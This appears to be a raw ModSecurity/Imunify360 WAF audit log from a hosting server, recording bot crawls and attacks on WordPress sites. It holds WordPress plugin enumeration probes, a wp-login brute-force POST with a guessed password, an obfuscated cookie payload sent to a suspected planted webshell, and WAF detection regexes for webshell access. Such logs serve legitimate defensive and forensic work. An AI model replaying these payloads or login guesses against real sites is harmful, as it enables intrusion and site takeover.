Server: Apache Engine-Mode: "ENABLED" --b889760f-Z-- --408bb320-A-- [01/Jul/2025:10:15:16.994216 +0530] aGNn3E2iOLYJJIAs-GUhWgAAADY 52.2.83.227 32003 192.168.74.40 443 --408bb320-B-- GET /pps/product/chik-jasmine-175ml HTTP/1.1 Connection: close Host: bmschool.in User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 Accept-Encoding: gzip,deflate --408bb320-F-- HTTP/1.1 403 Forbidden Content-Length: 318 Connection: close Content-Type: text/html; charset=iso-8859-1 --408bb320-H-- Message: Access denied with code 403 (phase 2). [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "432"] [id "77350440"] [msg "IM360 WAF: Scan attempt by Amazon bot||Range:||RSV:7.05||RS:0||T:APACHE||"] [severity "CRITICAL"] [tag "service_im360"] Message: Operator EQ matched 1 at TX:trapped. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/000_i360_init.conf"] [line "74"] [id "33329"] [msg "IPRec: G: P: F:||RSV:7.05||RS:403||T:APACHE||"] [severity "DEBUG"] [tag "service_im360"] [tag "noshow"] -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --f2864a00-Z-- --f08f8d27-A-- [01/Jul/2025:11:03:54.668658 +0530] aGNzQjaeUPKx3wbVIjc83AAAAAQ 178.128.124.79 50782 192.168.74.40 80 --f08f8d27-B-- GET /wp-content/plugins/litespeed-cache/readme.txt HTTP/1.1 Host: 103.185.74.40 User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 Accept-Encoding: gzip, deflate Accept: */* Connection: keep-alive --f08f8d27-F-- HTTP/1.1 404 Not Found Accept-Ranges: bytes Cache-Control: no-cache, no-store, must-revalidate Pragma: no-cache Expires: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html --f08f8d27-H-- Message: Pattern match "(wlwmanifest\\.xml|readme\\.txt|changelog\\.(md|txt)|lang_upload\\.php|arm_widgets_js\\.js|__\\sUPDATES.txt|wpuef-configurator.js)" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/008_i360_wordpress.conf"] [line "1820"] [id "77350190"] [msg "IM360 WAF: WordPress plugins/themes version enumeration||RSV:7.05||RS:0||T:APACHE||REQUEST_URI:/wp-content/plugins/litespeed-cache/readme.txt||"] [severity "NOTICE"] [tag "wp_core"] [tag "noshow"] Message: String match "readme.txt" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/008_i360_wordpress.conf"] [line "1827"] [id "77350589"] [msg "IM360 WAF: WordPress plugins/themes version enumeration using readme.txt||MV:/wp-content/plugins/litespeed-cache/readme.txt||User:||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "wp_core"] [tag "noshow"] Message: String match "/wp-content/plugins/litespeed-cache/readme.txt" at REQUEST_URI. 
[file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/008_i360_wordpress.conf"] [line "2221"] [id "77350639"] [msg "IM360 WAF: Suspicious access attempt to WordPress debug.log (CVE-2024-44000)||MV:/wp-content/plugins/litespeed-cache/readme.txt||WPU:||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "wp_core"] Apache-Handler: default-handler Stopwatch: 1751348034659360 9681 (- - -) Stopwatch2: 1751348034659360 9681; combined=4856, p1=121, p2=4578, p3=0, p4=0, p5=157, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --f08f8d27-Z-- --eb6d0a63-A-- [01/Jul/2025:11:03:55.153653 +0530] aGNzQfqfoIC6W-q1ciUeOwAAAAY 43.130.71.237 60776 192.168.74.40 443 --eb6d0a63-B-- GET /?p=12 HTTP/1.1 Host: thecouturelove.com User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 Cache-Control: no-cache Connection: keep-alive, close Pragma: no-cache Upgrade-Insecure-Requests: 1 --eb6d0a63-F-- HTTP/1.1 301 Moved Permanently X-Powered-By: PHP/8.1.18 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private X-Redirect-By: WordPress Location: https://thecouturelove.com/my-account/ -- Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. 
[file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/014_i360_infectors.conf"] [line "50"] [id "77140878"] [msg "IM360 WAF: Infectors: Suspicious access attempt (webshell)!||MVN:REQUEST_URI||WPU:||RSV:7.05||RS:0||T:APACHE||MV:/wp-includes/images/about.php||SC:/home/smtckolkata/public_html/wp-includes||"] [severity "DEBUG"] [tag "service_im360"] Stopwatch: 1751348716996176 7816 (- - -) Stopwatch2: 1751348716996176 7816; combined=4995, p1=141, p2=4563, p3=121, p4=4, p5=165, sr=61, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --0ab08464-Z-- --8e21627f-A-- [01/Jul/2025:11:15:17.353038 +0530] aGN17NBVQea5xcY0Z4sKaAAAAEs 103.185.74.40 36481 192.168.74.40 443 --8e21627f-B-- PURGE /.* HTTP/1.1 Host: insightconvey.com User-Agent: WordPress/6.8.1; https://insightconvey.com; EPC/v2.2.2/epc_scheduled_purge_all Accept: */* Accept-Encoding: deflate, gzip Connection: close --8e21627f-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.1.18 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://insightconvey.com/wp-json/>; rel="https://api.w.org/" X-Newfold-Cache-Level: 0 X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --8e21627f-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. 
[file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751348716112548 1240836 (- - -) Stopwatch2: 1751348716112548 1240836; combined=2581, p1=130, p2=2302, p3=0, p4=0, p5=149, sr=62, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --8e21627f-Z-- --c8c71135-A-- [01/Jul/2025:11:15:18.913494 +0530] aGN17qDMHeoQpg_c-kybJQAAAA0 20.171.207.232 53250 192.168.74.40 443 --c8c71135-B-- GET /rajasthan-tours-from-Jaisalmer/rajasthan-tours-from-udaipur/aainag/images/rajasthan-tours-from-ahmedabad/js/Rajasthan-Travel-Guides/Alwar-City-Guide.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --c8c71135-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --c8c71135-H-- -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751348720006532 20272 (- - -) Stopwatch2: 1751348720006532 20272; combined=4427, p1=193, p2=4057, p3=0, p4=0, p5=176, sr=86, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --85658266-Z-- --f9c8940c-A-- [01/Jul/2025:11:15:20.201753 +0530] aGN17dtVjKpVQzZMAPj_wwAAABM 103.185.74.40 34514 192.168.74.40 443 --f9c8940c-B-- PURGE /.* HTTP/1.1 Host: insightconvey.com User-Agent: WordPress/6.8.1; https://insightconvey.com; EPC/v2.2.2/epc_scheduled_purge_all Accept: */* Accept-Encoding: deflate, gzip Connection: close --f9c8940c-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.1.18 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://insightconvey.com/wp-json/>; rel="https://api.w.org/" X-Newfold-Cache-Level: 0 X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --f9c8940c-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751348717568307 2633700 (- - -) Stopwatch2: 1751348717568307 2633700; combined=3145, p1=111, p2=2842, p3=0, p4=0, p5=192, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --f9c8940c-Z-- --b39d6c1a-A-- [01/Jul/2025:11:15:21.398778 +0530] aGN18HP0Jk4x95VoTQHQYwAAAB4 205.185.122.222 15613 192.168.74.40 443 --b39d6c1a-B-- POST /wp-login.php HTTP/1.1 Host: arts.net.in Connection: keep-alive Accept-Encoding: none Accept: */* user-agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36 Cookie: wordpress_test_cookie=WP%20Cookie%20check Content-Length: 126 Content-Type: application/x-www-form-urlencoded --b39d6c1a-C-- log=admin&redirect_to=https%3A%2F%2Farts.net.in%2Fwp-admin%2F&wp-submit=Log%2BIn&testcookie=1&rememberme=forever&pwd=hello2024 --b39d6c1a-F-- HTTP/1.1 200 OK X-Powered-By: PHP/7.4.33 -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751350672027474 16800 (- - -) Stopwatch2: 1751350672027474 16800; combined=3707, p1=157, p2=3391, p3=0, p4=0, p5=159, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --4542543b-Z-- --94c47d24-A-- [01/Jul/2025:11:47:58.011819 +0530] aGN9lFQwuo9FDgaxsyzAWgAAAAQ 103.185.74.40 34254 192.168.74.40 443 --94c47d24-B-- PURGE /.* HTTP/1.1 Host: siaretech.in User-Agent: WordPress/6.8.1; https://siaretech.in; EPC/v2.2.1/option_update_two_optimized_date_front_page Accept: */* Accept-Encoding: deflate, gzip Connection: close --94c47d24-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private X-TWO-OPTIMIZE: 1 X-TWO-VERSION: 2.30.7 X-TWO-CACHE-DATE: 1732769506 X-TWO-WEBP: 1 X-TWO-PAGE-IS-OPTIMIZED: 0 X-TWO-OPTIMIZE-REASON: Request mode is: PURGE Link: <https://siaretech.in/wp-json/>; rel="https://api.w.org/" X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Vary: User-Agent Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --94c47d24-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751350676819315 1193202 (- - -) Stopwatch2: 1751350676819315 1193202; combined=3368, p1=116, p2=3058, p3=0, p4=0, p5=194, sr=61, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --94c47d24-Z-- --bdc8ea38-A-- [01/Jul/2025:11:48:00.205885 +0530] aGN9lsNQB2FKfldYI5vV1AAAACo 103.185.74.40 3893 192.168.74.40 443 --bdc8ea38-B-- PURGE /.* HTTP/1.1 Host: siaretech.in User-Agent: WordPress/6.8.1; https://siaretech.in; EPC/v2.2.1/option_update_two_optimized_date_front_page Accept: */* Accept-Encoding: deflate, gzip Connection: close --bdc8ea38-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private X-TWO-OPTIMIZE: 1 X-TWO-VERSION: 2.30.7 X-TWO-CACHE-DATE: 1732769506 X-TWO-WEBP: 1 X-TWO-PAGE-IS-OPTIMIZED: 0 X-TWO-OPTIMIZE-REASON: Request mode is: PURGE Link: <https://siaretech.in/wp-json/>; rel="https://api.w.org/" X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Vary: User-Agent Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --bdc8ea38-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751350678224707 1981789 (- - -) Stopwatch2: 1751350678224707 1981789; combined=3438, p1=115, p2=3172, p3=0, p4=0, p5=150, sr=70, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --bdc8ea38-Z-- --0bc3077c-A-- [01/Jul/2025:11:48:02.217032 +0530] aGN9msIXN_Q6mf9hmKQZswAAABY 47.128.60.146 12880 192.168.74.40 443 --0bc3077c-B-- GET /rajasthan-tours-from-ahmedabad/https/Rajasthan-Travel-Guides/Rajasthan-Travel-Guides/rajasthan-tours-from-udaipur/rajasthan-tours-from-agra/https/rajasthan-tours-from-jaipur/https/tnc.php HTTP/1.1 Host: abhaytravelsindia.digitaltheka.com Connection: keep-alive Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com) Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/heif,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751350682197471 20167 (- - -) Stopwatch2: 1751350682197471 20167; combined=3973, p1=172, p2=3216, p3=0, p4=0, p5=584, sr=83, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --0bc3077c-Z-- --a65db57a-A-- [01/Jul/2025:11:48:02.369776 +0530] aGN9mFQwuo9FDgaxsyzAWwAAAAQ 103.185.74.40 51088 192.168.74.40 443 --a65db57a-B-- PURGE /.* HTTP/1.1 Host: siaretech.in User-Agent: WordPress/6.8.1; https://siaretech.in; EPC/v2.2.1/option_update_two_optimized_date_front_page Accept: */* Accept-Encoding: deflate, gzip Connection: close --a65db57a-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private X-TWO-OPTIMIZE: 1 X-TWO-VERSION: 2.30.7 X-TWO-CACHE-DATE: 1732769506 X-TWO-WEBP: 1 X-TWO-PAGE-IS-OPTIMIZED: 0 X-TWO-OPTIMIZE-REASON: Request mode is: PURGE Link: <https://siaretech.in/wp-json/>; rel="https://api.w.org/" X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Vary: User-Agent Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --a65db57a-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751350680708303 1661760 (- - -) Stopwatch2: 1751350680708303 1661760; combined=3689, p1=114, p2=3329, p3=0, p4=0, p5=245, sr=74, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --a65db57a-Z-- --dcecff4b-A-- [01/Jul/2025:11:48:02.447847 +0530] aGN9msIXN_Q6mf9hmKQZtAAAABY 47.128.60.146 12880 192.168.74.40 443 --dcecff4b-B-- GET /rajasthan-tours-from-ahmedabad/https/Rajasthan-Travel-Guides/Rajasthan-Travel-Guides/rajasthan-tours-from-udaipur/rajasthan-tours-from-agra/https/rajasthan-tours-from-jaipur/https/css/main.css HTTP/1.1 Host: abhaytravelsindia.digitaltheka.com Connection: keep-alive User-Agent: Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com) Accept: text/css,*/*;q=0.1 Accept-Language: en-US,en;q=0.5 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: style -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751350683538774 17712 (- - -) Stopwatch2: 1751350683538774 17712; combined=3737, p1=147, p2=3148, p3=0, p4=0, p5=441, sr=66, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --c763bc6c-Z-- --4480814a-A-- [01/Jul/2025:11:48:05.032433 +0530] aGN9mtM7oYN-VqWG9-xaJQAAAAY 103.185.74.40 49959 192.168.74.40 443 --4480814a-B-- PURGE /.* HTTP/1.1 Host: siaretech.in User-Agent: WordPress/6.8.1; https://siaretech.in; EPC/v2.2.1/option_update_two_optimized_date_front_page Accept: */* Accept-Encoding: deflate, gzip Connection: close --4480814a-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private X-TWO-OPTIMIZE: 1 X-TWO-VERSION: 2.30.7 X-TWO-CACHE-DATE: 1732769506 X-TWO-WEBP: 1 X-TWO-PAGE-IS-OPTIMIZED: 0 X-TWO-OPTIMIZE-REASON: Request mode is: PURGE Link: <https://siaretech.in/wp-json/>; rel="https://api.w.org/" X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Vary: User-Agent Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --4480814a-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751350682580366 2452855 (- - -) Stopwatch2: 1751350682580366 2452855; combined=3356, p1=109, p2=3009, p3=0, p4=0, p5=238, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --4480814a-Z-- --95f3ec58-A-- [01/Jul/2025:11:48:11.786593 +0530] aGN9o52hmv68DcpiKu1QpQAAADY 20.171.207.232 35272 192.168.74.40 443 --95f3ec58-B-- GET /https/aainag/rajasthan-tours-from-delhi/js/images/https/Rajasthan-Travel-Guides/images/testimonials/luxury.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --95f3ec58-F-- -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --c084943e-Z-- --862a211a-A-- [01/Jul/2025:11:50:59.970229 +0530] aGN-S3kiRFXExwViSTcoWAAAACE 124.156.225.181 43506 192.168.74.40 80 --862a211a-B-- GET / HTTP/1.1 Host: 103.185.74.40:80 User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 Cache-Control: no-cache Connection: keep-alive, close Pragma: no-cache Upgrade-Insecure-Requests: 1 --862a211a-F-- HTTP/1.1 200 OK Last-Modified: Wed, 17 Jun 2020 20:01:33 GMT Accept-Ranges: bytes Content-Length: 163 Cache-Control: no-cache, no-store, must-revalidate Pragma: no-cache Expires: 0 Connection: close Content-Type: text/html --862a211a-H-- Message: Pattern match "\\b(close|keep-alive),[\\t\\n\\r ]{0,1}(close|keep-alive)\\b" at REQUEST_HEADERS:Connection. 
[file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/013_i360_generic.conf"] [line "86"] [id "77210350"] [msg "IM360 WAF: Multiple/Conflicting Connection Header Data Found||MVN:REQUEST_HEADERS:Connection||MV:keep-alive, close||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] Message: Pattern match "\\b(?:keep-alive|close),\\s?(?:keep-alive|close)\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/016_i360_monitor.conf"] [line "138"] [id "77350508"] [msg "IM360 WAF: Suspicious Connection Header||MV:keep-alive, close||RSV:7.05||RS:200||T:APACHE||"] [severity "DEBUG"] [tag "service_im360"] [tag "noshow"] Stopwatch: 1751350859963953 6754 (- - -) Stopwatch2: 1751350859963953 6754; combined=3702, p1=92, p2=3398, p3=75, p4=3, p5=134, sr=53, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --862a211a-Z-- --92982776-A-- [01/Jul/2025:11:51:00.814790 +0530] aGN-TA1y54KOcSyJ2lkbzgAAAAk 20.171.207.232 56328 192.168.74.40 443 --92982776-B-- GET /https/aainag/rajasthan-tours-from-delhi/js/images/https/images/Car-Rentals-Bikaner.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --92982776-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --92982776-H-- Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. 
[file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "20"] [id "77140735"] [msg "IM360 WAF: Suspicious access attempt (webshell)||MVN:REQUEST_URI||MV:/https/aainag/rajasthan-tours-from-delhi/js/images/https/images/Car-Rentals-Bikaner.php||SC:||WPU:||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751352319072279 25378 (- - -) Stopwatch2: 1751352319072279 25378; combined=2788, p1=213, p2=2389, p3=0, p4=0, p5=186, sr=53, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --eebe2d4b-Z-- --99ef683b-A-- [01/Jul/2025:12:15:31.328279 +0530] aGOECQHoebBrQTuTmOgLtgAAADk 103.185.74.40 2985 192.168.74.40 443 --99ef683b-B-- PURGE /.* HTTP/1.1 Host: insightconvey.com User-Agent: WordPress/6.8.1; https://insightconvey.com; EPC/v2.2.2/epc_scheduled_purge_all Accept: */* Accept-Encoding: deflate, gzip Connection: close --99ef683b-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.1.18 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://insightconvey.com/wp-json/>; rel="https://api.w.org/" X-Newfold-Cache-Level: 0 X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --99ef683b-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. 
[file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751352329884233 1444805 (- - -) Stopwatch2: 1751352329884233 1444805; combined=2901, p1=125, p2=2595, p3=0, p4=0, p5=180, sr=64, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --99ef683b-Z-- --e0e12830-A-- [01/Jul/2025:12:15:32.067547 +0530] aGOEDLEnAYhd9f7WDAyLHQAAACY 92.204.55.95 37016 192.168.74.40 443 --e0e12830-B-- POST /wp-content/plugins/elementor/vendor_prefixed/dependency-injection/php-di/php-di/src/Definition/Exception/91hero.php HTTP/1.1 Host: spectra.alchemyibs.com Cookie: 4=d6cd46cb008a0343c788d20c01827b74; 3=WTEcpaZ9LKWlLKysMzyfqTIlXSgmrKAsM2I0K3EyoKOsMTylXPxfVv90oKNvYPViqzSlY3EgpPVfnJ5cK2qyqPtvqKOfo2SxK3EgpS9xnKVvXFkaMKEyoaLbVyESGINvXFkaMKEyoaLbVyEAHPVcYTqyqTA3MPtcKFx7WTZ9pzS3qKWfMTIwo2EyXPEsHR9GISfvoaNvKFx7Mz9lMJSwnPtxMTylplOuplNxMPy7nJLbnKAsMTylXPExXFLzVTymK3qlnKEuLzkyXPExXFy7WUN9VafxMU0iYaOupzkyK3Ein2IhplV7nJLbMzyfMI9jqKEsL29hqTIhqUZbWUNfWTZcXKgcozAfqJEyVPEjB0O1ozkcozfbWUNcB2I4nKD7sK19MTyyXPVuoz90q3W0LzjuVvx7; 1=53; 0=71 sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="101", "Microsoft Edge";v="101" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.64 Safari/537.36 Edg/101.0.1210.47 Accept: */* Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip,deflate Accept-Language: eo;q=0.8,en-US;q=0.6,en;q=0.4 -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751352329483395 2652438 (- - -) Stopwatch2: 1751352329483395 2652438; combined=1101, p1=139, p2=805, p3=0, p4=0, 
